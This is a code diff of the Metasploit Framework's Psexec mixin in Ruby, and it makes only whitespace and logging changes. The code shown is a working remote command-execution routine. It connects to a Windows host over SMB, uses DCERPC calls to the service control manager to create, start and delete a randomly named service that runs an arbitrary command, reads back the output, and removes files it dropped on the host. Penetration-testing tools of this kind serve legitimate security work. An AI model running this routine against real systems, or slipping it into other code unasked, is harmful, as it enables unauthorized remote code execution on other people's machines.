@@ -13,6 +13,7 @@ module Exploit::Remote::Psexec
13
13
include Msf ::Exploit ::Remote ::DCERPC
14
14
include Msf ::Exploit ::Remote ::SMB
15
15
16
+
16
17
# Retrives output from the executed command
17
18
# @param smbshare [String] The SMBshare to connect to. Usually C$
18
19
# @param ip [IP Address] Remote Host to Connect To
@@ -21,7 +22,6 @@ module Exploit::Remote::Psexec
21
22
# @return output or nil if fails
22
23
def get_output ( smbshare , ip , file )
23
24
begin
24
- print_status ( "Getting the command output..." )
25
25
simple . connect ( "\\ \\ #{ ip } \\ #{ smbshare } " )
26
26
outfile = simple . open ( file , 'ro' )
27
27
output = outfile . read
@@ -42,14 +42,11 @@ def get_output(smbshare, ip, file)
42
42
# @param command [String] Should be a valid windows command
43
43
# @return true if everything wen't well
44
44
def psexec ( command )
45
-
46
45
simple . connect ( "\\ \\ #{ datastore [ 'RHOST' ] } \\ IPC$" )
47
-
48
46
handle = dcerpc_handle ( '367abb81-9844-35f1-ad32-98f038001003' , '2.0' , 'ncacn_np' , [ "\\ svcctl" ] )
49
47
vprint_status ( "#{ peer } - Binding to #{ handle } ..." )
50
48
dcerpc_bind ( handle )
51
49
vprint_status ( "#{ peer } - Bound to #{ handle } ..." )
52
-
53
50
vprint_status ( "#{ peer } - Obtaining a service manager handle..." )
54
51
scm_handle = nil
55
52
stubdata =
@@ -63,16 +60,13 @@ def psexec(command)
63
60
print_error ( "#{ peer } - Error: #{ e } " )
64
61
return false
65
62
end
66
-
67
63
servicename = Rex ::Text . rand_text_alpha ( 11 )
68
64
displayname = Rex ::Text . rand_text_alpha ( 16 )
69
65
holdhandle = scm_handle
70
66
svc_handle = nil
71
67
svc_status = nil
72
-
73
68
stubdata =
74
69
scm_handle + NDR . wstring ( servicename ) + NDR . uwstring ( displayname ) +
75
-
76
70
NDR . long ( 0x0F01FF ) + # Access: MAX
77
71
NDR . long ( 0x00000110 ) + # Type: Interactive, Own process
78
72
NDR . long ( 0x00000003 ) + # Start: Demand
@@ -96,18 +90,15 @@ def psexec(command)
96
90
print_error ( "#{ peer } - Error: #{ e } " )
97
91
return false
98
92
end
99
-
100
93
vprint_status ( "#{ peer } - Closing service handle..." )
101
94
begin
102
95
response = dcerpc . call ( 0x0 , svc_handle )
103
96
rescue ::Exception
104
97
end
105
-
106
98
vprint_status ( "#{ peer } - Opening service..." )
107
99
begin
108
100
stubdata =
109
101
scm_handle + NDR . wstring ( servicename ) + NDR . long ( 0xF01FF )
110
-
111
102
response = dcerpc . call ( 0x10 , stubdata )
112
103
if dcerpc . last_response != nil and dcerpc . last_response . stub_data != nil
113
104
svc_handle = dcerpc . last_response . stub_data [ 0 , 20 ]
@@ -116,7 +107,6 @@ def psexec(command)
116
107
print_error ( "#{ peer } - Error: #{ e } " )
117
108
return false
118
109
end
119
-
120
110
vprint_status ( "#{ peer } - Starting the service..." )
121
111
stubdata =
122
112
svc_handle + NDR . long ( 0 ) + NDR . long ( 0 )
@@ -128,7 +118,6 @@ def psexec(command)
128
118
print_error ( "#{ peer } - Error: #{ e } " )
129
119
return false
130
120
end
131
-
132
121
vprint_status ( "#{ peer } - Removing the service..." )
133
122
stubdata =
134
123
svc_handle
@@ -139,19 +128,18 @@ def psexec(command)
139
128
rescue ::Exception => e
140
129
print_error ( "#{ peer } - Error: #{ e } " )
141
130
end
142
-
143
131
vprint_status ( "#{ peer } - Closing service handle..." )
144
132
begin
145
133
response = dcerpc . call ( 0x0 , svc_handle )
146
134
rescue ::Exception => e
147
135
print_error ( "#{ peer } - Error: #{ e } " )
148
136
end
149
-
150
137
select ( nil , nil , nil , 1.0 )
151
138
simple . disconnect ( "\\ \\ #{ datastore [ 'RHOST' ] } \\ IPC$" )
152
139
return true
153
140
end
154
141
142
+
155
143
# This method is called by file_dropper to remove files droped
156
144
# By your module
157
145
#
@@ -166,6 +154,7 @@ def file_rm(file)
166
154
psexec ( delete )
167
155
end
168
156
157
+
169
158
# This method stores files in an Instance array
170
159
# The files are then deleted from the remote host once
171
160
# the cleanup_after method is called
@@ -178,6 +167,7 @@ def register_file_for_cleanup(*file)
178
167
@dropped_files += file
179
168
end
180
169
170
+
181
171
# This method removes any files that were dropped on the remote system
182
172
# and marked with the register_file_for_cleanup method
183
173
def cleanup_after